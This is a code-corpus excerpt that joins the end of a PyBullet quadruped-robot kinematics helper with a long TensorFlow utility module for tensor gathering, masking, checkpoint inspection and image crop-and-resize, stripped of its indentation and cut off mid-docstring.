joint_angles = [all_joint_angles[i] for i in joint_ids]
return joint_angles
def link_position_in_base_frame(
robot: typing.Any,
link_id: int,
):
"""Computes the link's local position in the robot frame.
Args:
robot: A robot instance.
link_id: The link to calculate its relative position.
Returns:
The relative position of the link.
"""
base_position, base_orientation = robot.GetBasePosition(
), robot.GetBaseOrientation()
inverse_translation, inverse_rotation = robot.pybullet_client.invertTransform(
base_position, base_orientation)
link_state = robot.pybullet_client.getLinkState(robot.quadruped, link_id)
link_position = link_state[0]
link_local_position, _ = robot.pybullet_client.multiplyTransforms(
inverse_translation, inverse_rotation, link_position, (0, 0, 0, 1))
# link_local_position = [0]*3
return np.array(link_local_position)
def compute_jacobian(
robot: typing.Any,
link_id: int,
):
"""Computes the Jacobian matrix for the given link.
Args:
robot: A robot instance.
link_id: The link id as returned from loadURDF.
Returns:
The 3 x N transposed Jacobian matrix. where N is the total DoFs of the
robot. For a quadruped, the first 6 columns of the matrix corresponds to
the CoM translation and rotation. The columns corresponds to a leg can be
extracted with indices [6 + leg_id * 3: 6 + leg_id * 3 + 3].
"""
all_joint_angles = [state[0] for state in robot.joint_states]
zero_vec = [0] * len(all_joint_angles)
jv, _ = robot.pybullet_client.calculateJacobian(robot.quadruped, link_id,
(0, 0, 0), all_joint_angles,
zero_vec, zero_vec)
jacobian = np.array(jv)
return jacobian
| StarcoderdataPython |
8160585 | #coding=utf-8
import tensorflow as tf
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python import pywrap_tensorflow
import wml_utils as wmlu
import os
import numpy as np
import logging
import wsummary
import basic_tftools as btf
from tfop import set_value
_HASH_TABLE_COLLECTION = "HASH_TABLE"
_MEAN_RGB = [123.15, 115.90, 103.06]
isSingleValueTensor = btf.isSingleValueTensor
static_or_dynamic_map_fn = btf.static_or_dynamic_map_fn
variable_summaries = wsummary.variable_summaries
variable_summaries_v2 = wsummary.variable_summaries_v2
histogram = wsummary.histogram
histogram_or_scalar = wsummary.histogram_or_scalar
image_summaries = wsummary.image_summaries
_draw_text_on_image = wsummary._draw_text_on_image
image_summaries_with_label = wsummary.image_summaries_with_label
row_image_summaries = wsummary.row_image_summaries
combined_static_and_dynamic_shape = btf.combined_static_and_dynamic_shape
batch_gather = btf.batch_gather
show_return_shape = btf.show_return_shape
add_name_scope = btf.add_name_scope
add_variable_scope = btf.add_variable_scope
probability_case = btf.probability_case
indices_to_dense_vector = btf.indices_to_dense_vector
PrintSummary = btf.PrintSummary
PrintSummaryV2 = btf.PrintSummaryV2
PrintNaNorInf = btf.PrintNaNorInf
def add_to_hash_table_collection(value):
tf.add_to_collection(_HASH_TABLE_COLLECTION,value)
def get_hash_table_collection():
return tf.get_collection(_HASH_TABLE_COLLECTION)
def parameterNum(argus):
num = 0
print(type(argus))
if isinstance(argus,dict):
argus = argus.values()
for argu in argus:
dim=1
shape = argu.get_shape().as_list()
for v in shape:
dim *= v
num += dim
return num
def show_values(values,name=None,fn=print):
string = ""
if name is not None:
string += name+"\n"
for v in values:
string += str(v)+"\n"
fn(string)
def show_values_name(values,name=None,fn=print):
string = ""
if name is not None:
string += name+"\n"
for v in values:
string += str(v.name)+"\n"
fn(string)
def gather_in_axis_with_one_dim_indices(data,indices,axis=0):
'''
:param data: a tensor with more than one dims
:param indices: one dim indeces
:param axis:
:return:
example:
data = [[1,3,2],[9,8,7]]
indices = [1,2,0]
res = [[3,2,1],[8,7,9]]
'''
assert data.get_shape().ndims<=1,"error indices dim."
if axis == 0:
return tf.gather(data,indices)
indices = tf.reshape(indices,[-1])
perm = range(len(data.get_shape().as_list()))
perm[0] = axis
perm[axis] = 0
data = tf.transpose(data,perm=perm)
data = tf.gather(data,indices)
data = tf.transpose(data,perm)
return data
def gather_in_axis_with_two_dim_indices(data,indices,axis=0):
'''
:param data: [batch_size,...], a tensor with more than one dims.
:param indices: [batch_size,X], indices with exactly two dims.
:param axis:
example:
data = [[1,3,2],[7,8,9]]
indices = [[1,2,0],[2,1,0]]
res = [[3,2,1],[9,8,7]]
'''
assert indices.get_shape().ndims ==2, "error indices dim."
if axis == 0:
return tf.gather(data, indices)
if axis==1:
data = tf.map_fn(lambda x:tf.gather(x[0],x[1]), elems=(data,indices),dtype=(data.dtype))
else:
perm = range(len(data.get_shape().as_list()))
perm[1] = axis
perm[axis] = 1
data = tf.transpose(data, perm=perm)
data = tf.map_fn(lambda x:tf.gather(x[0],x[1]), elems=(data,indices),dtype=(data.dtype))
data = tf.transpose(data, perm)
return data
def gather_in_axis(data,indices,axis=0):
if axis == 0:
return tf.gather(data,indices)
if indices.get_shape().ndims<=1:
return gather_in_axis_with_one_dim_indices(data,indices,axis)
else:
return gather_in_axis_with_two_dim_indices(data,indices,axis)
return data
'''
'''
def apply_with_random_selector(x, func, num_cases):
sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)
'''
只有当case==sel时func才会收到一个可用的tensor
merge返回一个available tensor和index
'''
return control_flow_ops.merge([
func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)
for case in range(num_cases)])[0]
def random_select_tensors(tensors):
sel = tf.random_uniform([], maxval=len(tensors), dtype=tf.int32)
return control_flow_ops.merge([
control_flow_ops.switch(x, tf.equal(sel, case))[1]
for case,x in enumerate(tensors)])[0]
def _ImageDimensions(image):
if image.get_shape().is_fully_defined():
return image.get_shape().as_list()
else:
static_shape = image.get_shape().with_rank(3).as_list()
dynamic_shape = array_ops.unstack(array_ops.shape(image), 3)
return [s if s is not None else d
for s, d in zip(static_shape, dynamic_shape)]
def resize_image(image, size,
method=tf.image.ResizeMethod.BILINEAR,
align_corners=False):
with tf.name_scope('resize_image'):
height, width, channels = _ImageDimensions(image)
image = tf.expand_dims(image, 0)
image = tf.image.resize_images(image, size,
method, align_corners)
image = tf.reshape(image, tf.stack([size[0], size[1], channels]))
return image
def reshape_list(l, shape=None):
r = []
if shape is None:
for a in l:
if isinstance(a, (list, tuple)):
r = r + list(a)
else:
r.append(a)
else:
i = 0
for s in shape:
if s == 1:
r.append(l[i])
else:
r.append(l[i:i+s])
i += s
return r
'''
将var作为图像记录
var:[batch_size,X]
'''
def scale_image_summaries(var,name,max_outputs=3,heigh=None):
shape = var.get_shape().as_list()
if heigh is None:
heigh = shape[-1]/3
var = tf.expand_dims(var,axis=1)
var = tf.expand_dims(var,axis=3)
var = tf.image.resize_nearest_neighbor(var,size=[heigh,shape[-1]])
tf.summary.image(name,var,max_outputs=max_outputs)
def top_k_mask_nd(value,k=1):
assert value.shape.ndims>1, "error dim size"
shape = btf.combined_static_and_dynamic_shape(value)
N = 1
for i in range(len(shape)-1):
N = N*shape[i]
value = tf.reshape(value,[N,shape[-1]])
values, indics = tf.nn.top_k(value, k)
indics, _ = tf.nn.top_k(-indics, k)
indics1 = -indics
indics0 = tf.reshape(tf.range(N),[N,1])
indics0 = tf.tile(indics0,[1,k])
indics = tf.reshape(indics1,[-1,1])
indics0 = tf.reshape(indics0,[-1,1])
indics = tf.concat([indics0,indics],axis=1)
res = tf.cast(tf.sparse_to_dense(indics,[N,shape[-1]], 1), tf.bool)
res = tf.reshape(res,shape)
indics1 = tf.reshape(indics1,shape[:-1]+[k])
return res,indics1
def top_k_mask_1d(value,k=1):
assert value.shape.ndims==1, "error dim size"
values, indics = tf.nn.top_k(value, k)
indics, _ = tf.nn.top_k(-indics, k)
indics = -indics
shape = btf.combined_static_and_dynamic_shape(value)
res = tf.cast(tf.sparse_to_dense(indics, shape, 1), tf.bool)
return res,indics
def top_k_mask(value,k=1,shape=None,return_indices=False):
with tf.name_scope("top_k_mask"):
if value.shape.ndims == 1:
res,indices = top_k_mask_1d(value,k=k)
else:
res,indices = top_k_mask_nd(value,k=k)
if shape is not None:
res = tf.reshape(res,shape)
if return_indices:
return res,indices
else:
return res
def random_top_k_mask_nd(value,k=3,nr=1):
assert value.shape.ndims>1, "error dim size"
shape = btf.combined_static_and_dynamic_shape(value)
N = 1
for i in range(len(shape)-1):
N = N*shape[i]
value = tf.reshape(value,[N,shape[-1]])
values, indics = tf.nn.top_k(value, k)
indics = tf.transpose(indics)
indics = tf.random_shuffle(indics)
indics = indics[:nr,:]
indics = tf.transpose(indics)
indics, _ = tf.nn.top_k(-indics, nr)
indics1 = -indics
indics0 = tf.reshape(tf.range(N),[N,1])
indics0 = tf.tile(indics0,[1,nr])
indics = tf.reshape(indics1,[-1,1])
indics0 = tf.reshape(indics0,[-1,1])
indics = tf.concat([indics0,indics],axis=1)
res = tf.cast(tf.sparse_to_dense(indics,[N,shape[-1]], 1), tf.bool)
res = tf.reshape(res,shape)
return res,indics1
def random_top_k_mask_1d(value,k=3,nr=1):
assert value.shape.ndims==1, "error dim size"
values, indics = tf.nn.top_k(value, k)
indics = tf.random_shuffle(indics)
indics = indics[:nr]
indics, _ = tf.nn.top_k(-indics, nr)
indics = -indics
res = tf.cast(tf.sparse_to_dense(indics, value.shape, 1), tf.bool)
return res,indics
'''
从value中选出得分最高的k个,再从k个中随机选nr个返回
'''
def random_top_k_mask(value,k=3,nr=1,shape=None,return_indices=False):
with tf.name_scope("top_k_mask"):
if value.shape.ndims == 1:
res,indices = random_top_k_mask_1d(value,k=k,nr=nr)
else:
res,indices = random_top_k_mask_nd(value,k=k,nr=nr)
if shape is not None:
res = tf.reshape(res,shape)
if return_indices:
return res,indices
else:
return res
def bottom_k_mask(value, k=1,shape=None):
return top_k_mask(-value,k,shape)
'''
根据index指定的值在x的第二维中选择数据
index: (Y)
x:(Y,M,N,...)
return:
x:(Y,N,...)
'''
def select_2thdata_by_index(x,index):
if not isinstance(x,tf.Tensor):
x = tf.convert_to_tensor(x)
if not isinstance(index,tf.Tensor):
index = tf.convert_to_tensor(index)
if not x.get_shape().is_fully_defined() or not index.get_shape().is_fully_defined():
return select_2thdata_by_index_v2(x,index)
d_shape = index.get_shape().as_list()
x_2th_size = x.get_shape().as_list()[1]
range = tf.range(0, d_shape[0],dtype=tf.int32)
range = tf.expand_dims(range, axis=1)
index = tf.expand_dims(index, axis=1)
if index.dtype is not tf.int32:
index = tf.cast(index,tf.int32)
d_masks = tf.concat(values=[range, index], axis=1)
d_masks = tf.sparse_to_dense(d_masks, [d_shape[0], x_2th_size], 1)
res = tf.boolean_mask(x, tf.cast(d_masks, tf.bool))
return res
def select_2thdata_by_index_v2(x,index):
'''
handle with the situation which x or index's shape is not fully defined.
:param x: (Y,M,N,...)
:param index: (Y)
:return: (Y,N,...)
'''
if not isinstance(x,tf.Tensor):
x = tf.convert_to_tensor(x)
if not isinstance(index,tf.Tensor):
index = tf.convert_to_tensor(index)
d_shape = tf.shape(index)
x_2th_size = tf.shape(x)[1]
range = tf.range(0, d_shape[0],dtype=tf.int32)
range = tf.expand_dims(range, axis=1)
index = tf.expand_dims(index, axis=1)
if index.dtype is not tf.int32:
index = tf.cast(index,tf.int32)
d_masks = tf.concat(values=[range, index], axis=1)
d_masks = tf.sparse_to_dense(d_masks, [d_shape[0], x_2th_size], 1)
res = tf.boolean_mask(x, tf.cast(d_masks, tf.bool))
return res
def select_2thdata_by_index_v3(x,index):
'''
handle with the situation which x or index's first two dim is not fully defined.
:param x: (Y,M,N,...)
:param index: (Y)
:return: (Y,N,...)
'''
if not isinstance(x,tf.Tensor):
x = tf.convert_to_tensor(x)
if not isinstance(index,tf.Tensor):
index = tf.convert_to_tensor(index)
batch_size = x.get_shape().as_list()[0]
old_shape = tf.shape(x)
new_shape = [-1]+x.get_shape().as_list()[2:]
x = tf.reshape(x,new_shape)
res = tf.gather(x, tf.range(old_shape[0], dtype=tf.int32) * old_shape[1]+ index)
if batch_size is not None:
res = tf.reshape(res,[batch_size]+new_shape[1:])
return res
def get_ckpt_file_path(path):
if tf.gfile.IsDirectory(path):
try:
ckpt_state = tf.train.get_checkpoint_state(path)
if ckpt_state is not None:
return ckpt_state.model_checkpoint_path
else:
print("Error checkpoint state.")
return None
except tf.errors.OutOfRangeError as e:
print("Cannot restore checkpoint:%s" % e)
return None
elif tf.gfile.Exists(path):
return path
#process the situation of path is a tensorflow check point file
#like ../../tmp/tod_traindatav1/data.ckpt-3901
dir_path = os.path.dirname(path)
file_name = os.path.basename(path)
if ".ckpt" not in file_name:
return None
files = wmlu.recurse_get_filepath_in_dir(dir_path)
for f in files:
f = os.path.basename(f)
if f.startswith(file_name):
return path
return None
def get_variables_in_ckpt(file_path):
reader = pywrap_tensorflow.NewCheckpointReader(file_path)
var_to_shape_map = reader.get_variable_to_shape_map()
return list(var_to_shape_map.keys())
def get_variables_in_ckpt_in_dir(dir_path):
file_path = get_ckpt_file_path(dir_path)
return get_variables_in_ckpt(file_path)
def get_variables_dict_in_ckpt(file_path):
reader = pywrap_tensorflow.NewCheckpointReader(file_path)
var_to_shape_map = reader.get_variable_to_shape_map()
return var_to_shape_map
def get_variables_dict_in_ckpt_in_dir(dir_path):
file_path = get_ckpt_file_path(dir_path)
if file_path is None:
return None
return get_variables_dict_in_ckpt(file_path)
def get_variables_unrestored(restored_values,file_path,exclude_var=None):
variables_in_ckpt = get_variables_in_ckpt(file_path)
for value in restored_values:
if value in variables_in_ckpt:
variables_in_ckpt.remove(value)
res_variable = list(variables_in_ckpt)
if exclude_var is not None:
scopes = [ scope.strip() for scope in exclude_var.split(",")]
for scope in scopes:
for v in variables_in_ckpt:
if scope in v:
res_variable.remove(v)
return res_variable
def get_variables_unrestoredv1(restored_values,exclude_var=None):
all_variables = list(map(lambda x:x.name,tf.global_variables()))
for i, v in enumerate(all_variables):
index = v.find(':')
if index > 0:
all_variables[i] = all_variables[i][:index]
for value in restored_values:
if value in all_variables:
all_variables.remove(value)
res_variable = list(all_variables)
if exclude_var is not None:
scopes = [ scope.strip() for scope in exclude_var.split(",")]
for scope in scopes:
for v in all_variables:
if scope in v:
res_variable.remove(v)
return res_variable
def int64_feature(value):
if not isinstance(value, list) and not isinstance(value,np.ndarray):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def floats_feature(value):
if not isinstance(value, list) and not isinstance(value,np.ndarray):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def bytes_feature(value):
if not isinstance(value, list):
value = [value]
value = [v if isinstance(v,bytes) else v.encode("utf-8") for v in value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def bytes_vec_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def merge(scopes=None):
if scopes is None:
return tf.summary.merge_all()
scopes_list = [scope.strip() for scope in scopes.split(',')]
summaries_list = []
for scope in scopes_list:
values = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
summaries_list.extend(values)
return tf.summary.merge(summaries_list)
def merge_exclude(excludes=None):
if excludes is None:
return tf.summary.merge_all()
vars = tf.get_collection(tf.GraphKeys.SUMMARIES)
exclude_list = [exclude.strip() for exclude in excludes.split(',')]
summaries_list = []
for exclude in exclude_list:
summaries_list = []
for var in vars:
if not var.name.startswith(exclude):
summaries_list.append(var)
vars = summaries_list
return tf.summary.merge(summaries_list)
def join_scopes(scope,subscopes):
if isinstance(subscopes,str):
subscopes = [x.strip() for x in subscopes.split(",")]
else:
assert(isinstance(subscopes,list))
return [scope+"/"+x for x in subscopes]
def range_scopes(scope,min,max):
indexs = range(min,max)
return [scope%i for i in indexs]
def reshape(tensor,shape,name=None):
if isinstance(shape,list):
shape = [ x if (isinstance(x,tf.Tensor) or (x is not None and x >= 0)) else -1 for x in shape]
return tf.reshape(tensor,shape,name)
return tf.reshape(tensor,shape,name)
def check_value_in_ckp(sess,scope):
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,
scope)
logging.info("Check {}".format(scope))
if len(variables) == 0:
logging.warning(f"No variables in {scope}.")
return None
print(sess.run([tf.reduce_sum(variables[0]),
tf.reduce_sum(tf.abs(variables[0])),
tf.reduce_min(variables[0]),
tf.reduce_max(variables[0]),
tf.reduce_mean(variables[0])]))
def check_value_in_ckpv2(sess,variable):
graph = tf.get_default_graph()
variable = graph.get_tensor_by_name(variable)
print(sess.run([tf.reduce_sum(variable),
tf.reduce_sum(tf.abs(variable)),
tf.reduce_min(variable),
tf.reduce_max(variable),
tf.reduce_mean(variable)]))
def unstack(value,axis=0,name="unstack",keep_dim=False):
if keep_dim == False:
return tf.unstack(value=value,name=name,axis=axis)
else:
with tf.name_scope(name):
res = tf.unstack(value=value,axis=axis)
res = [tf.expand_dims(x,axis=axis) for x in res]
return res
def image_zero_mean_unit_range(inputs):
"""Map image values from [0, 255] to [-1, 1]."""
return (2.0 / 255.0) * tf.to_float(inputs) - 1.0
def mean_pixel(model_variant=None):
"""Gets mean pixel value.
This function returns different mean pixel value, depending on the input
model_variant which adopts different preprocessing functions. We currently
handle the following preprocessing functions:
(1) _preprocess_subtract_imagenet_mean. We simply return mean pixel value.
(2) _preprocess_zero_mean_unit_range. We return [127.5, 127.5, 127.5].
The return values are used in a way that the padded regions after
pre-processing will contain value 0.
Args:
model_variant: Model variant (string) for feature extraction. For
backwards compatibility, model_variant=None returns _MEAN_RGB.
Returns:
Mean pixel value.
"""
if model_variant is None:
return _MEAN_RGB
else:
return [127.5, 127.5, 127.5]
def num_elements(input):
if input.get_shape().is_fully_defined():
return input.get_shape().num_elements()
else:
return tf.reduce_prod(tf.shape(input))
'''
input: [batch_size,D,H,W,C]
size:[ND,NH,NW]
'''
def resize_biliner3d(input,size):
shape = tf.shape(input)
input = tf.reshape(input,[shape[0]*shape[1],shape[2],shape[3],shape[4]])
input = tf.image.resize_bilinear(input, size[1:], align_corners=True)
shape = [shape[0],shape[1],size[1],size[2],shape[4]]
input = tf.reshape(input,shape)
input = tf.transpose(input,perm=[0,3,1,2,4])
input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
input = tf.image.resize_bilinear(input, size[:2], align_corners=True)
shape = [shape[0],size[0],size[1],size[2],shape[4]]
input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
input = tf.transpose(input,perm=[0,2,3,1,4])
return input
def resize_depth(input,depth):
shape = tf.shape(input)
old_type = input.dtype
input = tf.transpose(input,perm=[0,3,1,2,4])
input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
input = tf.image.resize_bilinear(input, size=(depth,shape[2]), align_corners=True)
shape = [shape[0],depth,shape[2],shape[3],shape[4]]
input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
input = tf.transpose(input,perm=[0,2,3,1,4])
if old_type != input.dtype:
input = tf.cast(input,old_type)
return input
def resize_nearest_neighbor3d(input,size):
shape = tf.shape(input)
input = tf.reshape(input,[shape[0]*shape[1],shape[2],shape[3],shape[4]])
input = tf.image.resize_nearest_neighbor(input, size[1:], align_corners=True)
shape = [shape[0],shape[1],size[1],size[2],shape[4]]
input = tf.reshape(input,shape)
input = tf.transpose(input,perm=[0,3,1,2,4])
input = tf.reshape(input,[shape[0]*shape[3],shape[1],shape[2],shape[4]])
input = tf.image.resize_nearest_neighbor(input, size[:2], align_corners=True)
shape = [shape[0],size[0],size[1],size[2],shape[4]]
input = tf.reshape(input,[shape[0],shape[3],shape[1],shape[2],shape[4]])
input = tf.transpose(input,perm=[0,2,3,1,4])
return input
'''
sparse_indices: [X,Y,...,M,1], 包含了应该设置为sparse_value的index, 格式与top_k返回的格式相同
如[[0]
[1],
[0],
...
]
res:
[X,Y,....,M,dim_size]
'''
def sparse_to_dense(sparse_indices, dim_size, sparse_value, default_value=0):
old_shape = tf.shape(sparse_indices)
first_dim_size = tf.reduce_prod(old_shape)
out_shape = tf.convert_to_tensor([tf.reduce_prod(tf.shape(sparse_indices)),dim_size])
sparse_indices = tf.reshape(sparse_indices,[-1])
sparse_indices = tf.stack([tf.range(first_dim_size),sparse_indices],axis=1)
res = tf.sparse_to_dense(sparse_indices,output_shape=out_shape,sparse_values=sparse_value,default_value=default_value)
res = tf.reshape(res,tf.concat([old_shape[:-1],[dim_size]],axis=0))
return res
def label_smooth(labels,num_classes,smoothed_value=0.9):
'''
:param labels: shape=[batch_size]
:param num_classes: shape=()
:param smoothed_value: shape=()
:return: shape-[batch_size,num_classes]
'''
if labels.get_shape().ndims != 1:
raise ValueError("Labels's should be one dimensional.")
if not isinstance(num_classes,int):
raise ValueError("num_classes should be a integer")
if not isinstance(smoothed_value,float):
raise ValueError("smoothed_value should be a float")
default_value = (1.0-smoothed_value)/(num_classes-1)
res = tf.ones(shape=[tf.shape(labels)[0],num_classes],dtype=tf.float32)*default_value
res = tf.map_fn(lambda x:set_value(x[0],v=tf.constant([smoothed_value]),index=x[1]),elems=(res,labels),
dtype=tf.float32,back_prop=False)
return res
def label_smoothv1(labels,num_classes,smoothed_value=0.9):
'''
:param labels: shape=[batch_size]
:param num_classes: shape=()
:param smoothed_value: shape=()
:return: shape-[batch_size,num_classes]
'''
if labels.get_shape().ndims != 1:
raise ValueError("Labels's should be one dimensional.")
if not isinstance(num_classes,int):
raise ValueError("num_classes should be a integer")
if not isinstance(smoothed_value,float):
raise ValueError("smoothed_value should be a float")
default_value = (1.0-smoothed_value)
def fn(index):
data = tf.zeros(shape=[num_classes],dtype=tf.float32)
data0 = set_value(data,v=tf.constant([default_value]),index=tf.constant(0))
data1 = set_value(data,v=tf.constant([smoothed_value]),index=index)
return tf.add(data0,data1)
res_data = tf.map_fn(fn,elems=(labels),
dtype=tf.float32,back_prop=False)
return res_data
def split(datas,num):
if isinstance(datas,tf.Tensor):
return tf.split(datas,num_or_size_splits=num)
else:
res = []
for data in datas:
res.append(tf.split(data,num_or_size_splits=num))
return res
def fixed_padding(inputs, kernel_size, rate=1):
"""Pads the input along the spatial dimensions independently of input size.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
kernel_size: The kernel to be used in the conv2d or max_pool2d operation.
Should be a positive integer.
rate: An integer, rate for atrous convolution.
Returns:
output: A tensor of size [batch, height_out, width_out, channels] with the
input, either intact (if kernel_size == 1) or padded (if kernel_size > 1).
"""
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
padded_inputs = tf.pad(inputs, [[0, 0], [pad_beg, pad_end],
[pad_beg, pad_end], [0, 0]])
return padded_inputs
'''
mask0:[X]
mask1:[Y]
return:
mask:[X]
'''
def merge_mask(mask0,mask1):
indices = tf.range(tf.reshape(tf.shape(mask0),()))
indices = tf.boolean_mask(indices,mask0)
indices = tf.boolean_mask(indices,mask1)
res = tf.sparse_to_dense(sparse_indices=indices,output_shape=tf.shape(mask0),sparse_values=True,default_value=False)
return res
def assert_equal(v,values,name=None):
assert_ops = []
for i in range(1,len(values)):
assert_ops.append(tf.assert_equal(values[0],values[i],name=name))
with tf.control_dependencies(assert_ops):
return tf.identity(v)
def assert_shape_equal(v,values,name=None):
shapes = [tf.shape(value) for value in values]
return assert_equal(v,shapes,name=name)
'''
image:[batch_size,H,W,C]/[H,W,C]
bboxes:[batch_size,X,4]/[X,4] (ymin,xmin,ymax,xmax) in [0,1]
length::[batch_size]
size:(H,W)
output:
[box_nr,size[0],size[1],C]
'''
def tf_crop_and_resizev2(image,bboxes,size,lengths=None):
if len(image.get_shape())==3:
assert len(bboxes.get_shape())==2, "error box shape"
image = tf.expand_dims(image,axis=0)
bboxes = tf.expand_dims(bboxes,axis=0)
assert len(image.get_shape())==4,"error image shape"
assert len(bboxes.get_shape())==3,"error bboxes shape"
B,H,W,C = btf.combined_static_and_dynamic_shape(image)
_,X,_ = btf.combined_static_and_dynamic_shape(bboxes)
bboxes = tf.reshape(bboxes,[B*X,4])
index = tf.range(B)
index = tf.tile(tf.reshape(index,[B,1]),[1,X])
index = tf.reshape(index,[-1])
if lengths is not None:
mask = tf.sequence_mask(lengths,maxlen=X)
mask = tf.reshape(mask,[-1])
bboxes = tf.boolean_mask(bboxes,mask)
index = tf.boolean_mask(index,mask)
images = tf.image.crop_and_resize(image,bboxes,index,size)
return images
'''
image:[batch_size,X,H,W,C]/[X,H,W,C]
bboxes:[batch_size,X,4]/[X,4] (ymin,xmin,ymax,xmax) in [0,1]
size:(H,W)
lengths: [batch_size]
output:
[batch_size,box_nr,size[0],size[1],C]/ [box_nr,size[0],size[1],C]
or [Y,size[0],size[1],C] if lengths is not None
'''
def tf_crop_and_resize(image,bboxes,size,lengths=None):
if len(image.get_shape()) == 4:
image = tf.expand_dims(image,axis=0)
bboxes = tf.expand_dims(bboxes,axis=0)
return tf.squeeze(batch_tf_crop_and_resize(image,bboxes,size),axis=0)
elif len(image.get_shape()) == 5:
res = batch_tf_crop_and_resize(image,bboxes,size)
if lengths is not None:
B,X,H,W,C = btf.combined_static_and_dynamic_shape(image)
mask = tf.reshape(tf.sequence_mask(lengths,X),[-1])
res = tf.reshape(res,[-1,size[0],size[1],C])
res = tf.boolean_mask(res,mask)
return res
else:
raise Exception("Error image ndims.")
'''
image:[batch_size,X,H,W,C]
bboxes:[batch_size,X,4] (ymin,xmin,ymax,xmax) in [0,1]
size:(H,W)
output:
[batch_size,box_nr,size[0],size[1],C]
'''
def batch_tf_crop_and_resize(image,bboxes,size):
img_shape = btf.combined_static_and_dynamic_shape(image)
batch_size = img_shape[0]
box_nr = img_shape[1]
new_img_shape = [img_shape[0]*img_shape[1]]+img_shape[2:]
bboxes_shape = btf.combined_static_and_dynamic_shape(bboxes)
new_bboxes_shape = [bboxes_shape[0]*bboxes_shape[1],4]
image = reshape(image,new_img_shape)
bboxes = reshape(bboxes,new_bboxes_shape)
box_ind = tf.range(0,tf.reduce_prod(tf.shape(bboxes)[0]),dtype=tf.int32)
images = tf.image.crop_and_resize(image,bboxes,box_ind,size)
shape = btf.combined_static_and_dynamic_shape(images)
images = reshape(images,[batch_size,box_nr]+shape[1:])
return images
mask_to_indices = btf.mask_to_indices
def indices_to_mask(indices,size):
mask = tf.cast(indices_to_dense_vector(indices,size,1,default_value=0,dtype=tf.int32),tf.bool)
_,ind = tf.nn.top_k(indices,tf.reshape(tf.shape(indices),()))
ind = tf.reverse(ind,axis=[0])
return mask,ind
def batch_indices_to_mask(indices,lens,size):
if indices.get_shape().is_fully_defined():
ind_size = indices.get_shape().as_list()[1]
else:
ind_size = tf.shape(indices)[1]
def fn(ind,l):
ind = ind[:l]
mask,ind = indices_to_mask(ind,size)
ind = tf.pad(ind,tf.convert_to_tensor([[0,ind_size-l]]))
return mask,ind
return tf.map_fn(lambda x:fn(x[0],x[1]),elems=(indices,lens),dtype=(tf.bool,tf.int32),back_prop=False)
'''
每一个element分别执行boolean mask并pad到size大小
data:[N,X,...]
mask:[N,X]
size:()
return:
[N,size]
'''
def batch_boolean_mask(data,mask,size,return_length=False,scope=None):
with tf.name_scope(scope,default_name="batch_boolean_mask"):
if not isinstance(data,tf.Tensor):
data = tf.convert_to_tensor(data)
def fn(d,m):
d = tf.boolean_mask(d,m,name="boolean_mask_on_single_data")
padding = [[0,size-tf.shape(d)[0]]]
if d.get_shape().ndims>1:
padding = padding+[[0,0]]*(d.get_shape().ndims-1)
d = tf.pad(d,padding)
return d
data = tf.map_fn(lambda x:fn(x[0],x[1]),elems=(data,mask),dtype=(data.dtype),back_prop=False)
if return_length:
return data,tf.reduce_sum(tf.cast(mask,tf.int32),axis=-1,keepdims=False)
else:
return data
'''
每一个element分别执行boolean mask并 concat在一起
data:[N,X]
mask:[N,X]
N must be full defined
return:
[Y]
'''
def batch_boolean_maskv2(data,mask):
if not isinstance(data,tf.Tensor):
data = tf.convert_to_tensor(data)
res = []
shape = btf.combined_static_and_dynamic_shape(data)
for i in range(shape[0]):
res.append(tf.boolean_mask(data[i],mask[i]))
return tf.concat(res,axis=0)
'''
每一个element先用indices gather再执行boolean mask并 concat在一起
data:[M,X]
indices:[N,X]
mask:[N,X]
N must be full defined
return:
[Y]
'''
def batch_boolean_maskv3(data,indices,mask):
if not isinstance(data,tf.Tensor):
data = tf.convert_to_tensor(data)
res = []
shape = btf.combined_static_and_dynamic_shape(data)
for i in range(shape[0]):
indx = tf.boolean_mask(indices[i],mask[i])
d = tf.gather(data[i],indx)
res.append(d)
return tf.concat(res,axis=0)
def Print(data,*inputs,**kwargs):
op = tf.print(*inputs,**kwargs)
with tf.control_dependencies([op]):
return tf.identity(data)
def print_tensor_shape(input_,data,name=None,summarize=100):
data = [tf.shape(x) for x in data]
if name is not None:
data = [tf.constant(name+": ")]+data
return tf.Print(input_,data,summarize=summarize)
'''
indicator:[X],tf.bool
return:
[x]:tf.bool
'''
def subsample_indicator(indicator, num_samples):
with tf.name_scope("sample_indicator"):
indicator_shape = btf.combined_static_and_dynamic_shape(indicator)
indices = tf.where(indicator)
indices = tf.random_shuffle(indices)
indices = tf.reshape(indices, [-1])
if isinstance(num_samples,tf.Tensor) and num_samples.dtype != tf.int32:
num_samples = tf.cast(num_samples,tf.int32)
num_samples = tf.minimum(tf.size(indices), num_samples)
selected_indices = tf.slice(indices, [0], tf.reshape(num_samples, [1]))
selected_indicator = indices_to_dense_vector(selected_indices,
indicator_shape[0])
selected_indicator = tf.reshape(selected_indicator,indicator_shape)
return tf.equal(selected_indicator, 1)
def nearest_neighbor_upsampling(input_tensor, scale=None, height_scale=None,
width_scale=None,scope=None):
"""Nearest neighbor upsampling implementation.
Nearest neighbor upsampling function that maps input tensor with shape
[batch_size, height, width, channels] to [batch_size, height * scale
, width * scale, channels]. This implementation only uses reshape and
broadcasting to make it TPU compatible.
Args:
input_tensor: A float32 tensor of size [batch, height_in, width_in,
channels].
scale: An integer multiple to scale resolution of input data in both height
and width dimensions.
height_scale: An integer multiple to scale the height of input image. This
option when provided overrides `scale` option.
width_scale: An integer multiple to scale the width of input image. This
option when provided overrides `scale` option.
Returns:
data_up: A float32 tensor of size
